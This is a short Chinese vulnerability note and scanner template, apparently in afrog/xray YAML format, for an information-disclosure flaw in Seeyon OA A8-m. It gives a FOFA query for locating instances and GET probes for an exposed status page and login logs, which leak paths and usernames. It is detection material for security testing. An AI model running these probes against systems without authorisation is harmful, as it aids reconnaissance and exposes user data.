漏洞描述
致远OA A8-m 存在状态监控页面信息泄露,攻击者可以从其中获取网站路径和用户名等敏感信息进一步攻击
title="A8-m"
fofa:app="致远互联-OA"
id: seeyon-a8-info-disclosure
info:
name: 致远OA A8 信息泄露漏洞
author: zan8in
severity: medium
description: |
致远OA A8-m 存在状态监控页面信息泄露,攻击者可以从其中获取网站路径和用户名等敏感信息进一步攻击
title="A8-m"
fofa:app="致远互联-OA"
reference:
- http://wiki.peiqi.tech/wiki/oa/%E8%87%B4%E8%BF%9COA/%E8%87%B4%E8%BF%9COA%20A8%20status.jsp%20%E4%BF%A1%E6%81%AF%E6%B3%84%E9%9C%B2%E6%BC%8F%E6%B4%9E.html
rules:
r0:
request:
method: GET
path: /seeyon/management/status.jsp
expression: response.status == 200 && response.body.bcontains(b'Server') && response.body.bcontains(b'JVM') && response.body.bcontains(b'GC') && response.body.bcontains(b'http-80')
r1:
request:
method: GET
path: /seeyon/logs/login.log
expression: response.status == 200 && response.body.bcontains(b'[Access URL]') && response.body.bcontains(b'==>')
r2:
request:
method: GET
path: /seeyon/logs/v3x.log
expression: response.status == 200 && response.body.bcontains(b'[QuartzScheduler_Worker-1] INFO AccountDaoBean:29')
expression: r0() || r1() || r2()